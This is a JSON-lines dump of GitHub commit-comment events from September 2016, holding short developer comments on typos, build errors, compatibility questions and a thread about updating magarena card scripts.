{"id":"4544178059","type":"CommitCommentEvent","actor":{"login":"majst01"},"repo":{"name":"influxdata/influxdb-java"},"payload":{"comment":{"id":18973880,"position":5,"line":21,"path":"README.md","commit_id":"82c0006898c393830fcefd606e26a855aed30ef4","created_at":"2016-09-10T14:55:43Z","updated_at":"2016-09-10T14:55:43Z","body":"s /auogen/autogen"}},"created_at":"2016-09-10T14:55:43Z"}
{"id":"4544178824","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18973882,"position":null,"line":null,"path":null,"commit_id":"81482d8348eae0b4f2546477635162365d5d70d2","created_at":"2016-09-10T14:56:17Z","updated_at":"2016-09-10T14:56:17Z","body":"This break was introduced by JW at 5.6.3. It was not present in 5.6.2; nor in 5.6.4."}},"created_at":"2016-09-10T14:56:17Z"}
{"id":"4544179089","type":"CommitCommentEvent","actor":{"login":"dimitrinicolas"},"repo":{"name":"dimitrinicolas/marmottajax"},"payload":{"comment":{"id":18973883,"position":null,"line":null,"path":null,"commit_id":"815351fc8c72d4f0d2d4e6f333662264a29a8396","created_at":"2016-09-10T14:56:28Z","updated_at":"2016-09-10T14:56:28Z","body":"I understand your concept of making it modular, it is very interesting, but I wanted to keep a very very simple library, moreover I'm not really a fan of coffeescript, and having a coffescript repo on my personal github account wouldn't reflect my job.\r\n\r\nBut I find the idea of an advanced and modular ajax library fantastic, and I will endure this project !"}},"created_at":"2016-09-10T14:56:28Z"}
{"id":"4544179277","type":"CommitCommentEvent","actor":{"login":"justinal64"},"repo":{"name":"utleroy/spa-seasonal-sales"},"payload":{"comment":{"id":18973884,"position":3,"line":59,"path":"categories.js","commit_id":"0469c0731dc782573c46b2d7fc807325edfb9679","created_at":"2016-09-10T14:56:39Z","updated_at":"2016-09-10T14:56:39Z","body":"Test"}},"created_at":"2016-09-10T14:56:39Z"}
{"id":"4544179625","type":"CommitCommentEvent","actor":{"login":"melvinzhang"},"repo":{"name":"magarena/magarena"},"payload":{"comment":{"id":18973885,"position":null,"line":null,"path":null,"commit_id":"ece15ab802cc84fede5037ed07cda548e07fb265","created_at":"2016-09-10T14:56:51Z","updated_at":"2016-09-10T14:56:51Z","body":"What's the current method exactly? It would be best to start with that we are doing now and make some incremental improvements. I've started this page, https://github.com/magarena/magarena/wiki/Updating-existing-card-scripts"}},"created_at":"2016-09-10T14:56:51Z"}
{"id":"4544180201","type":"CommitCommentEvent","actor":{"login":"yangshun"},"repo":{"name":"momomods/momomods"},"payload":{"comment":{"id":18973887,"position":null,"line":null,"path":null,"commit_id":"a592e39bc6c492e20737ffe7303436eb21cc1220","created_at":"2016-09-10T14:57:18Z","updated_at":"2016-09-10T14:57:18Z","body":"-mindblown- omg don't do this one huge commit thing in future."}},"created_at":"2016-09-10T14:57:18Z"}
{"id":"4544181201","type":"CommitCommentEvent","actor":{"login":"melvinzhang"},"repo":{"name":"magarena/magarena"},"payload":{"comment":{"id":18973888,"position":null,"line":null,"path":null,"commit_id":"ece15ab802cc84fede5037ed07cda548e07fb265","created_at":"2016-09-10T14:58:03Z","updated_at":"2016-09-10T14:58:03Z","body":"Do you mean you put back the value, static, and all the other field manually? I can't quite see how that would be done unless you save a copy before overwriting it with the new version from scripts-builder."}},"created_at":"2016-09-10T14:58:03Z"}
{"id":"4544182181","type":"CommitCommentEvent","actor":{"login":"ShawnieBoy"},"repo":{"name":"magarena/magarena"},"payload":{"comment":{"id":18973889,"position":null,"line":null,"path":null,"commit_id":"ece15ab802cc84fede5037ed07cda548e07fb265","created_at":"2016-09-10T14:58:44Z","updated_at":"2016-09-10T14:58:44Z","body":"I use file comparison software to choose lines - kinda like merging on git."}},"created_at":"2016-09-10T14:58:44Z"}
{"id":"4544183149","type":"CommitCommentEvent","actor":{"login":"ShawnieBoy"},"repo":{"name":"magarena/magarena"},"payload":{"comment":{"id":18973890,"position":null,"line":null,"path":null,"commit_id":"ece15ab802cc84fede5037ed07cda548e07fb265","created_at":"2016-09-10T14:59:27Z","updated_at":"2016-09-10T14:59:27Z","body":"I personally find it easier to give scriptbuilder a list of card names, than having to get all the files that need editing and copying them into another folder."}},"created_at":"2016-09-10T14:59:27Z"}
{"id":"4544184487","type":"CommitCommentEvent","actor":{"login":"hrydgard"},"repo":{"name":"hrydgard/ppsspp"},"payload":{"comment":{"id":18973891,"position":null,"line":null,"path":null,"commit_id":"de1643997f3a6d2cad22882726d8a67f08eb761e","created_at":"2016-09-10T15:00:17Z","updated_at":"2016-09-10T15:00:17Z","body":"You're right. This deserves another look."}},"created_at":"2016-09-10T15:00:17Z"}
{"id":"4544187177","type":"CommitCommentEvent","actor":{"login":"igrigorik"},"repo":{"name":"igrigorik/ga-beacon"},"payload":{"comment":{"id":18973896,"position":null,"line":null,"path":null,"commit_id":"6acd8627bb7be36f24f5516e9873c92719a50e55","created_at":"2016-09-10T15:02:01Z","updated_at":"2016-09-10T15:02:01Z","body":"Ah, great find. Indeed, it would. Up for making a pull? :-)"}},"created_at":"2016-09-10T15:02:01Z"}
{"id":"4544188783","type":"CommitCommentEvent","actor":{"login":"azd2"},"repo":{"name":"azd2/PokeAlarm"},"payload":{"comment":{"id":18973898,"position":33,"line":159,"path":"alarms/alarm_manager.py","commit_id":"3cf13443917fcda9feb04d099a5ddb27bd7029ab","created_at":"2016-09-10T15:02:50Z","updated_at":"2016-09-10T15:02:50Z","body":"This is to inform about pokemon, that are nor on the notify list, but have higher iv than 97 (I dont care about Snorlax anymore because i have to many, but if a 100 IV one is found, i still want to be notified). 97 can be changed to whatwever you like..."}},"created_at":"2016-09-10T15:02:50Z"}
{"id":"4544188925","type":"CommitCommentEvent","actor":{"login":"Mr-MEX"},"repo":{"name":"nitrogen-os-devices/android_vendor_lge_hammerhead"},"payload":{"comment":{"id":18973899,"position":null,"line":null,"path":null,"commit_id":"d7a5ed70db5628c780d3dd14181b0e70451003e6","created_at":"2016-09-10T15:02:55Z","updated_at":"2016-09-10T15:02:55Z","body":"@wakaber \r\nМда, надо искать обновлённый драйвер"}},"created_at":"2016-09-10T15:02:55Z"}
{"id":"4544190119","type":"CommitCommentEvent","actor":{"login":"jroweboy"},"repo":{"name":"jroweboy/citra"},"payload":{"comment":{"id":18973900,"position":null,"line":null,"path":null,"commit_id":"856c19805e166e2dbf7c47a29179058aa40eae85","created_at":"2016-09-10T15:03:44Z","updated_at":"2016-09-10T15:03:44Z","body":"Its not working yet.\n\nOn Sat, Sep 10, 2016 at 2:38 AM, Dragios <notifications@github.com> wrote:\n\n> And there is no icon created in desktop.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/jroweboy/citra/commit/856c19805e166e2dbf7c47a29179058aa40eae85#commitcomment-18973072>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AA6Iw1wYxvth2vPJoX9eLdIpAeaa0zCzks5qomx7gaJpZM4J5q73>\n> .\n>\n"}},"created_at":"2016-09-10T15:03:44Z"}
{"id":"4544190362","type":"CommitCommentEvent","actor":{"login":"jerryshaw12"},"repo":{"name":"paphonbth/AndroidN-ify"},"payload":{"comment":{"id":18973901,"position":null,"line":null,"path":null,"commit_id":"97504ffbe5fe5daf05b7ddac2f0e40d7d918b672","created_at":"2016-09-10T15:03:55Z","updated_at":"2016-09-10T15:03:55Z","body":"Is this compatible with cm12.1? "}},"created_at":"2016-09-10T15:03:55Z"}
{"id":"4544191249","type":"CommitCommentEvent","actor":{"login":"nonZero"},"repo":{"name":"veltzer/demos-python"},"payload":{"comment":{"id":18973902,"position":9,"line":10,"path":"src/examples/short/logging/basic.py","commit_id":"74dd8adb0d4e6ebe3cff76bf2d39ffafa3886812","created_at":"2016-09-10T15:04:32Z","updated_at":"2016-09-10T15:04:32Z","body":"Try `logging.basicConfig()`"}},"created_at":"2016-09-10T15:04:32Z"}
{"id":"4544191254","type":"CommitCommentEvent","actor":{"login":"Samaraslo"},"repo":{"name":"Samaraslo/ArquiDeSis"},"payload":{"comment":{"id":18973903,"position":null,"line":null,"path":null,"commit_id":"db34b115fcb0eabdfa9a8546a8d4cbd96ecb484b","created_at":"2016-09-10T15:04:32Z","updated_at":"2016-09-10T15:04:32Z","body":"Criamos o primeiro app android - aula 13\r\n\r\nSamara Lima de Oliveira RA 201411373\r\nSaulo Gomes da Silva RA 201411823"}},"created_at":"2016-09-10T15:04:32Z"}
{"id":"4544194307","type":"CommitCommentEvent","actor":{"login":"gaa-cifasis"},"repo":{"name":"CIFASIS/megadeth"},"payload":{"comment":{"id":18973909,"position":null,"line":null,"path":null,"commit_id":"2c1c10ef8fb8f56cc12310514e1f029529d3d394","created_at":"2016-09-10T15:06:31Z","updated_at":"2016-09-10T15:06:31Z","body":"Hello Sergei,\r\n\r\nIt is better to use QuickFuzz from the last revision. Are you trying to provide a stable version of QuickFuzz in Gentoo or something like that? (if this is the case, we can try to create and support some stable version of QuickFuzz and Megadeth).\r\n\r\nThanks!"}},"created_at":"2016-09-10T15:06:31Z"}
{"id":"4544195867","type":"CommitCommentEvent","actor":{"login":"sharkwinter"},"repo":{"name":"shadowsocks/openwrt-shadowsocks"},"payload":{"comment":{"id":18973914,"position":null,"line":null,"path":null,"commit_id":"f21785791c559a64500da0aa8863a86b18e357df","created_at":"2016-09-10T15:07:34Z","updated_at":"2016-09-10T15:07:34Z","body":"Cannot compile with errors:\r\n==========\r\nchecking for pcre-config... pcre-config\r\nchecking for pcre headers in ... not found\r\nchecking for library containing pcre_exec... no\r\nconfigure: error: Cannot find pcre library. Configure --with-pcre=DIR\r\n\r\nwith libpcre3 installed\r\n========\r\nii  libpcre16-3:amd64                          2:8.38-3.1                                                  amd64        Perl 5 Compatible Regular Expression Library - 16 bit runtime files\r\nii  libpcre3:amd64                             2:8.38-3.1                                                  amd64        Perl 5 Compatible Regular Expression Library - runtime files\r\nii  libpcre3-dev:amd64                         2:8.38-3.1                                                  amd64        Perl 5 Compatible Regular Expression Library - development files\r\nii  libpcre32-3:amd64                          2:8.38-3.1                                                  amd64        Perl 5 Compatible Regular Expression Library - 32 bit runtime files\r\nii  libpcrecpp0v5:amd64                        2:8.38-3.1                                                  amd64        Perl 5 Compatible Regular Expression Library - C++ runtime files\r\n"}},"created_at":"2016-09-10T15:07:34Z"}
{"id":"4544196137","type":"CommitCommentEvent","actor":{"login":"SunyataZero"},"repo":{"name":"dave-theunsub/clamtk"},"payload":{"comment":{"id":18973915,"position":87,"line":326,"path":"README","commit_id":"1a817a41eb12208f952d466138dcf4967de4c512","created_at":"2016-09-10T15:07:44Z","updated_at":"2016-09-10T15:07:44Z","body":"Is this the issue page for each github project?"}},"created_at":"2016-09-10T15:07:44Z"}
{"id":"4544196376","type":"CommitCommentEvent","actor":{"login":"paphonbth"},"repo":{"name":"paphonbth/AndroidN-ify"},"payload":{"comment":{"id":18973917,"position":null,"line":null,"path":null,"commit_id":"97504ffbe5fe5daf05b7ddac2f0e40d7d918b672","created_at":"2016-09-10T15:07:54Z","updated_at":"2016-09-10T15:07:54Z","body":"Should work with any MM. Don't know about LP."}},"created_at":"2016-09-10T15:07:54Z"}
{"id":"4544196763","type":"CommitCommentEvent","actor":{"login":"nirgal"},"repo":{"name":"ADOdb/ADOdb"},"payload":{"comment":{"id":18973918,"position":25,"line":542,"path":"drivers/adodb-pdo.inc.php","commit_id":"bd9eca9f40220f9918ec3cc7ae9ef422b3e448b8","created_at":"2016-09-10T15:08:11Z","updated_at":"2016-09-10T15:08:11Z","body":"This looks wrong. Why not move the 2 lines above - comment and undo `\\\"` escaping in `$s` - at the beginning of the function and let the other 2 `return` to proceed.\r\n\r\nIsn't qstr supposed to do quoting at all when magic_quotes?"}},"created_at":"2016-09-10T15:08:11Z"}
{"id":"4544197481","type":"CommitCommentEvent","actor":{"login":"vovkasm"},"repo":{"name":"gandm/language-babel"},"payload":{"comment":{"id":18973919,"position":6,"line":52,"path":"spec/grammar-spec.coffee","commit_id":"d6ec93d5f3cc37aaffe5e81e7e35920bab69e2a0","created_at":"2016-09-10T15:08:37Z","updated_at":"2016-09-10T15:08:37Z","body":"Is it possible to run only one subtest without wrapping it in 'describe' block? (Full test suite requires too much time to complete)"}},"created_at":"2016-09-10T15:08:37Z"}
{"id":"4544198982","type":"CommitCommentEvent","actor":{"login":"paplorinc"},"repo":{"name":"AlparSzabados/PMX-Parser"},"payload":{"comment":{"id":18973924,"position":41,"line":50,"path":"src/main/groovy/szabados/alpar/Parser.groovy","commit_id":"83c377587ef5edf27995b50c256a3fc1f75895ad","created_at":"2016-09-10T15:09:31Z","updated_at":"2016-09-10T15:09:31Z","body":"* :+1: for extraction\r\n* now it's obvious that this could be simplified. this way you're iterating over the same things multiple times. try to store intermediary results (e.g. in a `Map`)"}},"created_at":"2016-09-10T15:09:31Z"}
{"id":"4544200199","type":"CommitCommentEvent","actor":{"login":"noldor"},"repo":{"name":"codeigniter-jp/codeigniter-jp.github.io"},"payload":{"comment":{"id":18973926,"position":null,"line":null,"path":null,"commit_id":"4e94e778cf9095885d50751517adfc6800ff5923","created_at":"2016-09-10T15:10:12Z","updated_at":"2016-09-10T15:10:12Z","body":"賛同ありがとうございます！　置換しました。\r\nhttps://github.com/codeigniter-jp/codeigniter-jp.github.io/commit/3d2aeac851e72e4c90105da9366e4934a8d83a2c"}},"created_at":"2016-09-10T15:10:12Z"}
{"id":"4544200203","type":"CommitCommentEvent","actor":{"login":"paplorinc"},"repo":{"name":"AlparSzabados/PMX-Parser"},"payload":{"comment":{"id":18973927,"position":36,"line":45,"path":"src/main/groovy/szabados/alpar/Parser.groovy","commit_id":"83c377587ef5edf27995b50c256a3fc1f75895ad","created_at":"2016-09-10T15:10:12Z","updated_at":"2016-09-10T15:10:12Z","body":"it's usually a good idea to avoid internal mutations: return a new sorted `List` instead"}},"created_at":"2016-09-10T15:10:12Z"}
{"id":"4544200740","type":"CommitCommentEvent","actor":{"login":"LucyWilcox"},"repo":{"name":"LucyWilcox/focs-assignments"},"payload":{"comment":{"id":18973929,"position":1,"line":1,"path":"day2/hw1.bak","commit_id":"ba387a5f8548f154ec608abf77fb584169ec90be","created_at":"2016-09-10T15:10:27Z","updated_at":"2016-09-10T15:10:27Z","body":"For some reason, git appears to have re-added all my first day's work. Potentially because I changed my upstream to point at Fall16 not Spring16. In any case, my assignment for day3 is at the bottom of the page."}},"created_at":"2016-09-10T15:10:27Z"}
{"id":"4544203224","type":"CommitCommentEvent","actor":{"login":"ishantvivek"},"repo":{"name":"ishantvivek/android_device_samsung_kyleprods"},"payload":{"comment":{"id":18973934,"position":null,"line":null,"path":null,"commit_id":"a5aa06a1dc9148658256793d8b444a5f2eb77de2","created_at":"2016-09-10T15:12:06Z","updated_at":"2016-09-10T15:12:06Z","body":"Because of the code ofc. Performance profiles are now migrated to per device basis. We need to specify freqs and dependencies. \r\nhttps://github.com/ishantvivek/android_device_samsung_kyleprods/blob/a5aa06a1dc9148658256793d8b444a5f2eb77de2/libpower/power.h#L17"}},"created_at":"2016-09-10T15:12:06Z"}
{"id":"4544204921","type":"CommitCommentEvent","actor":{"login":"melvinzhang"},"repo":{"name":"magarena/magarena"},"payload":{"comment":{"id":18973936,"position":null,"line":null,"path":null,"commit_id":"ece15ab802cc84fede5037ed07cda548e07fb265","created_at":"2016-09-10T15:13:14Z","updated_at":"2016-09-10T15:13:14Z","body":"> I use file comparison software to choose lines - kinda like merging on git.\r\n\r\nAh, that makes sense now. I thought you overwrote the file, so you use a file comparison software to choose lines. Does this software work two file at a time? Or can you select two directories?\r\n\r\n> I personally find it easier to give scriptbuilder a list of card names, than having to get all the files that need editing and copying them into another folder.\r\n\r\nAs in you give scripts-builder a list of card name (via CardsMissingInMagarena.txt I presume) and it generates the new card scripts? Not sure what you mean by 'having to get all the files that need editing and copying them into another folder'.\r\n\r\n"}},"created_at":"2016-09-10T15:13:14Z"}
{"id":"4544205412","type":"CommitCommentEvent","actor":{"login":"noldor"},"repo":{"name":"codeigniter-jp/codeigniter-jp.github.io"},"payload":{"comment":{"id":18973937,"position":null,"line":null,"path":null,"commit_id":"4e94e778cf9095885d50751517adfc6800ff5923","created_at":"2016-09-10T15:13:33Z","updated_at":"2016-09-10T15:13:33Z","body":"https://github.com/codeigniter-jp/codeigniter-jp.github.io/commit/6d2d455f658317480cb4a7c426f065ae46e79c64\r\nダブルクォートが全角だったので直しました……。"}},"created_at":"2016-09-10T15:13:33Z"}
{"id":"4544205424","type":"CommitCommentEvent","actor":{"login":"linwoodc3"},"repo":{"name":"numba/llvmlite"},"payload":{"comment":{"id":18973938,"position":null,"line":null,"path":null,"commit_id":"9963a73d36e95a453d5559c05d7582044442e6d3","created_at":"2016-09-10T15:13:34Z","updated_at":"2016-09-10T15:13:34Z","body":"Did this get added?\r\n"}},"created_at":"2016-09-10T15:13:34Z"}
{"id":"4544208404","type":"CommitCommentEvent","actor":{"login":"darnatale"},"repo":{"name":"darnatale/native"},"payload":{"comment":{"id":18973943,"position":null,"line":null,"path":null,"commit_id":"bdfdae717cf5e5265df8e02c657357e70f0f47a1","created_at":"2016-09-10T15:15:32Z","updated_at":"2016-09-10T15:15:32Z","body":"- testing"}},"created_at":"2016-09-10T15:15:32Z"}
{"id":"4544208888","type":"CommitCommentEvent","actor":{"login":"ShawnieBoy"},"repo":{"name":"magarena/magarena"},"payload":{"comment":{"id":18973944,"position":null,"line":null,"path":null,"commit_id":"ece15ab802cc84fede5037ed07cda548e07fb265","created_at":"2016-09-10T15:15:54Z","updated_at":"2016-09-10T15:15:54Z","body":"If you're updating the image url, you have to place the files that need to be updated into the INPUT/invalid_image_scripts folder, then run scriptbuilder. I think you might have included that.\r\n\r\nThe output then needs to be edited to include the update date before being copied back into the main directory.\r\n\r\nSelecting the individual files that need updating would probably take the same amount of time as just rebuilding them all and then merging back,"}},"created_at":"2016-09-10T15:15:54Z"}
{"id":"4544210114","type":"CommitCommentEvent","actor":{"login":"Mr-MEX"},"repo":{"name":"nitrogen-os-devices/android_vendor_lge_hammerhead"},"payload":{"comment":{"id":18973946,"position":null,"line":null,"path":null,"commit_id":"d7a5ed70db5628c780d3dd14181b0e70451003e6","created_at":"2016-09-10T15:16:44Z","updated_at":"2016-09-10T15:16:44Z","body":"@wakaber \r\nВот нашёл список зависимостей:\r\n```\r\nlibdl.so\r\nlibcutils.so\r\nliblog.so\r\nlibc++.so\r\nlibc.so\r\nlibm.so\r\n```"}},"created_at":"2016-09-10T15:16:44Z"}
{"id":"4544210162","type":"CommitCommentEvent","actor":{"login":"jonsneyers"},"repo":{"name":"FLIF-hub/FLIF"},"payload":{"comment":{"id":18973947,"position":null,"line":null,"path":null,"commit_id":"e5c2c44c2373215185eebc9df4f6484a9f446a92","created_at":"2016-09-10T15:16:46Z","updated_at":"2016-09-10T15:16:46Z","body":"There appears to be a problem with this on some platforms (at least on ARMv7)."}},"created_at":"2016-09-10T15:16:46Z"}
{"id":"4544211908","type":"CommitCommentEvent","actor":{"login":"kgrgreer"},"repo":{"name":"foam-framework/foam2-experimental"},"payload":{"comment":{"id":18973950,"position":5,"line":820,"path":"src/foam/dao/dao.js","commit_id":"f2eb5951f7ecebdeab95f46696f0f83f37017073","created_at":"2016-09-10T15:17:53Z","updated_at":"2016-09-10T15:17:53Z","body":"What is this for?"}},"created_at":"2016-09-10T15:17:53Z"}
{"id":"4544212017","type":"CommitCommentEvent","actor":{"login":"Creeperface01"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18973951,"position":null,"line":null,"path":null,"commit_id":"8d8b71d2761e91e907b30c30b1202da488720549","created_at":"2016-09-10T15:17:57Z","updated_at":"2016-09-10T15:17:57Z","body":"i don't think this is good, because these methods can be used in plugins.. "}},"created_at":"2016-09-10T15:17:57Z"}
{"id":"4544212160","type":"CommitCommentEvent","actor":{"login":"ishantvivek"},"repo":{"name":"ishantvivek/android_device_samsung_kyleprods"},"payload":{"comment":{"id":18973952,"position":null,"line":null,"path":null,"commit_id":"a5aa06a1dc9148658256793d8b444a5f2eb77de2","created_at":"2016-09-10T15:18:04Z","updated_at":"2016-09-10T15:18:04Z","body":"Though, Performance needs some fine tuning. It's not adjusted very properly. will do that later, as i am merging all changes for Jenkins build(very soon), so users can download that from there. After today released. I will release cm13 today."}},"created_at":"2016-09-10T15:18:04Z"}
{"id":"4544213500","type":"CommitCommentEvent","actor":{"login":"ShawnieBoy"},"repo":{"name":"magarena/magarena"},"payload":{"comment":{"id":18973954,"position":null,"line":null,"path":null,"commit_id":"ece15ab802cc84fede5037ed07cda548e07fb265","created_at":"2016-09-10T15:18:59Z","updated_at":"2016-09-10T15:18:59Z","body":"For entire sets anyway"}},"created_at":"2016-09-10T15:18:59Z"}
{"id":"4544215041","type":"CommitCommentEvent","actor":{"login":"Adj1e"},"repo":{"name":"Ar1i/PokemonGo-Bot"},"payload":{"comment":{"id":18973955,"position":null,"line":null,"path":null,"commit_id":"933c1a8854fd4ec560c247f46727bef4f4058f90","created_at":"2016-09-10T15:20:08Z","updated_at":"2016-09-10T15:20:08Z","body":"thanks for add favorite"}},"created_at":"2016-09-10T15:20:08Z"}
{"id":"4544216165","type":"CommitCommentEvent","actor":{"login":"melvinzhang"},"repo":{"name":"magarena/magarena"},"payload":{"comment":{"id":18973956,"position":null,"line":null,"path":null,"commit_id":"ece15ab802cc84fede5037ed07cda548e07fb265","created_at":"2016-09-10T15:20:48Z","updated_at":"2016-09-10T15:20:48Z","body":"Goes to show I really have no idea... I thought you generated fresh card scripts by listing them in CardsMissingInMagarena.txt. Ok, so the correct way is to copy the card scripts that you want to update from Magarena/scripts into scripts-builder/invalid_image_scripts.\r\n\r\nThen run scripts-builder and it updates the image property automatically. Then use the file comparison tool to  compare the update script files and the original ones. Did I get it correct? "}},"created_at":"2016-09-10T15:20:48Z"}
{"id":"4544216434","type":"CommitCommentEvent","actor":{"login":"Slydelix"},"repo":{"name":"MarshRom/android_packages_apps_Settings"},"payload":{"comment":{"id":18973958,"position":null,"line":null,"path":null,"commit_id":"86b719502bff793e9ed5e9b8ab4632f3cf537e33","created_at":"2016-09-10T15:20:58Z","updated_at":"2016-09-10T15:20:58Z","body":"mate... this file... is there anything worth keeping here? not much commits from us... this one only i think"}},"created_at":"2016-09-10T15:20:58Z"}
{"id":"4544216563","type":"CommitCommentEvent","actor":{"login":"amalshehu"},"repo":{"name":"amalshehu/legendary-regex"},"payload":{"comment":{"id":18973959,"position":null,"line":null,"path":null,"commit_id":"f47ec647a126d72da128aa69b408cd5473ba2ff4","created_at":"2016-09-10T15:21:03Z","updated_at":"2016-09-10T15:21:03Z","body":"\r\n\r\n![result](https://cloud.githubusercontent.com/assets/12576673/18411597/449607d0-7798-11e6-8294-771b47352adc.png)\r\n"}},"created_at":"2016-09-10T15:21:03Z"}
{"id":"4544218105","type":"CommitCommentEvent","actor":{"login":"yuan78"},"repo":{"name":"yinqiwen/gsnova"},"payload":{"comment":{"id":18973960,"position":null,"line":null,"path":null,"commit_id":"54e857c7c7e1b7996f88d075b0b1ec2a9d1d2361","created_at":"2016-09-10T15:22:06Z","updated_at":"2016-09-10T15:22:06Z","body":"thanks, now deploy gae remote successfully.\nBut one more question, how add my scanned google IP into it?  add the IP\ninto host.json or client.json? And can gsnova support GVS IP?\n\nAnd still encounter the fakecert issue, cannot introduce the fakecert  into\nchrome,chrome also think the fakecert is a invalid or unrecognized cert ,\nthen it always show  https error of \"it's not private link  \" . How can I\nsolve this issue? Can I let gsnova re-generate new fakecert and introduce\nit into chrome? THX!\n\n2016-09-10 22:46 GMT+08:00 yinqiwen <notifications@github.com>:\n\n> The env 'GOPATH' must to be set first, and gsnova source code must be in\n> $GOPATH/src/github.com/yinqiwen/gsnova/.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/yinqiwen/gsnova/commit/54e857c7c7e1b7996f88d075b0b1ec2a9d1d2361#commitcomment-18973861>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AK_y70lRuYhElOURzegX3xFU9LuXQi-5ks5qosLIgaJpZM4J5oQB>\n> .\n>\n"}},"created_at":"2016-09-10T15:22:06Z"}
{"id":"4544218928","type":"CommitCommentEvent","actor":{"login":"nine7nine"},"repo":{"name":"nine7nine/Wine-Linux-stuff"},"payload":{"comment":{"id":18973961,"position":null,"line":null,"path":null,"commit_id":"858b307eb74b5edcb963bbbac906a7d421da5ea3","created_at":"2016-09-10T15:22:37Z","updated_at":"2016-09-10T15:22:37Z","body":"The edit was just to condense the script by a number on lines. I like my shell scripts to be nicely spaced, but I thought it would be best to compact it."}},"created_at":"2016-09-10T15:22:37Z"}
{"id":"4544220222","type":"CommitCommentEvent","actor":{"login":"Linkrw12"},"repo":{"name":"Linkrw12/Misc_Bioinformatic_Code"},"payload":{"comment":{"id":18973966,"position":null,"line":null,"path":null,"commit_id":"910b6dfabe791e2655e561c32af493311ee47b36","created_at":"2016-09-10T15:23:31Z","updated_at":"2016-09-10T15:23:31Z","body":"BLAST 30-mers of original fasta file sequences and parses output for total number of hits"}},"created_at":"2016-09-10T15:23:31Z"}
{"id":"4544221566","type":"CommitCommentEvent","actor":{"login":"simonecid"},"repo":{"name":"l-cadamuro/TauTagAndProbe"},"payload":{"comment":{"id":18973969,"position":29,"line":141,"path":"TauTagAndProbe/test/fitter/src/TurnonFit.cpp","commit_id":"408c23503e392e92618d5ffdded1664d7902c294","created_at":"2016-09-10T15:24:28Z","updated_at":"2016-09-10T15:24:28Z","body":"This line does not consider the selection anymore."}},"created_at":"2016-09-10T15:24:28Z"}
{"id":"4544221845","type":"CommitCommentEvent","actor":{"login":"ShawnieBoy"},"repo":{"name":"magarena/magarena"},"payload":{"comment":{"id":18973970,"position":null,"line":null,"path":null,"commit_id":"ece15ab802cc84fede5037ed07cda548e07fb265","created_at":"2016-09-10T15:24:41Z","updated_at":"2016-09-10T15:24:41Z","body":"Hehe, I'm generating fresh scripts and comparing, but you can copy the files over to scriptbuilder, for it to edit the url line."}},"created_at":"2016-09-10T15:24:41Z"}
{"id":"4544222993","type":"CommitCommentEvent","actor":{"login":"ShawnieBoy"},"repo":{"name":"magarena/magarena"},"payload":{"comment":{"id":18973971,"position":null,"line":null,"path":null,"commit_id":"ece15ab802cc84fede5037ed07cda548e07fb265","created_at":"2016-09-10T15:25:25Z","updated_at":"2016-09-10T15:25:25Z","body":"updated the wiki for what scriptbuilder can do"}},"created_at":"2016-09-10T15:25:25Z"}
{"id":"4544223505","type":"CommitCommentEvent","actor":{"login":"hGriff0n"},"repo":{"name":"hGriff0n/spero-std"},"payload":{"comment":{"id":18973972,"position":null,"line":null,"path":null,"commit_id":"059bd4b82abfd9c79ec2cd1ba2ba7d2d1bc491cf","created_at":"2016-09-10T15:25:46Z","updated_at":"2016-09-10T15:25:46Z","body":"Forgot I changed the folder (and module) name from \"collections\" to \"collection\""}},"created_at":"2016-09-10T15:25:46Z"}
{"id":"4544225453","type":"CommitCommentEvent","actor":{"login":"carnager"},"repo":{"name":"carnager/rofi-pass"},"payload":{"comment":{"id":18973975,"position":null,"line":null,"path":null,"commit_id":"41d0dbf8cae7e713687e3fcdcb2c769f27934a26","created_at":"2016-09-10T15:27:08Z","updated_at":"2016-09-10T15:27:08Z","body":"Should fix #54 "}},"created_at":"2016-09-10T15:27:08Z"}
{"id":"4544225900","type":"CommitCommentEvent","actor":{"login":"melvinzhang"},"repo":{"name":"magarena/magarena"},"payload":{"comment":{"id":18973976,"position":null,"line":null,"path":null,"commit_id":"ece15ab802cc84fede5037ed07cda548e07fb265","created_at":"2016-09-10T15:27:26Z","updated_at":"2016-09-10T15:27:26Z","body":"Thanks for writing out the steps, it is much clearer. Now I'm confused again, you just said that you didn't do that, instead you generated fresh scripts. Why not use the invalid_image_scripts method?"}},"created_at":"2016-09-10T15:27:26Z"}
{"id":"4544226666","type":"CommitCommentEvent","actor":{"login":"melvinzhang"},"repo":{"name":"magarena/magarena"},"payload":{"comment":{"id":18973977,"position":null,"line":null,"path":null,"commit_id":"ece15ab802cc84fede5037ed07cda548e07fb265","created_at":"2016-09-10T15:28:02Z","updated_at":"2016-09-10T15:28:02Z","body":"With the invalid_image_scripts method there is no need to do any merging, just copy all the files back and done."}},"created_at":"2016-09-10T15:28:02Z"}
{"id":"4544227616","type":"CommitCommentEvent","actor":{"login":"jlelse"},"repo":{"name":"jlelse/NewsCatchr-OpenSource"},"payload":{"comment":{"id":18973978,"position":null,"line":null,"path":null,"commit_id":"e30e50a9b91a8fd1bb74a4153829b91eee8a1515","created_at":"2016-09-10T15:28:41Z","updated_at":"2016-09-10T15:28:41Z","body":"Fixed #14 "}},"created_at":"2016-09-10T15:28:41Z"}
{"id":"4544229087","type":"CommitCommentEvent","actor":{"login":"ShawnieBoy"},"repo":{"name":"magarena/magarena"},"payload":{"comment":{"id":18973981,"position":null,"line":null,"path":null,"commit_id":"ece15ab802cc84fede5037ed07cda548e07fb265","created_at":"2016-09-10T15:29:48Z","updated_at":"2016-09-10T15:29:48Z","body":"Because going through the scripts folder and copy+pasting/moving each file for a whole set into scriptbuilder would probably take as long as merging. And you still need to insert a line after the url change.\r\n\r\nAlso fresh scriptbuilder scripts update oracle text and rarity as well."}},"created_at":"2016-09-10T15:29:48Z"}
{"id":"4544229513","type":"CommitCommentEvent","actor":{"login":"MartixEvolution"},"repo":{"name":"NPeopleGroup/NorthPeople"},"payload":{"comment":{"id":18973982,"position":12,"line":12,"path":"NorthPeopleJob/.classpath","commit_id":"1aed0c3d3f9de7adaead20e739c9683be6570e25","created_at":"2016-09-10T15:30:04Z","updated_at":"2016-09-10T15:30:04Z","body":"测试消息"}},"created_at":"2016-09-10T15:30:04Z"}
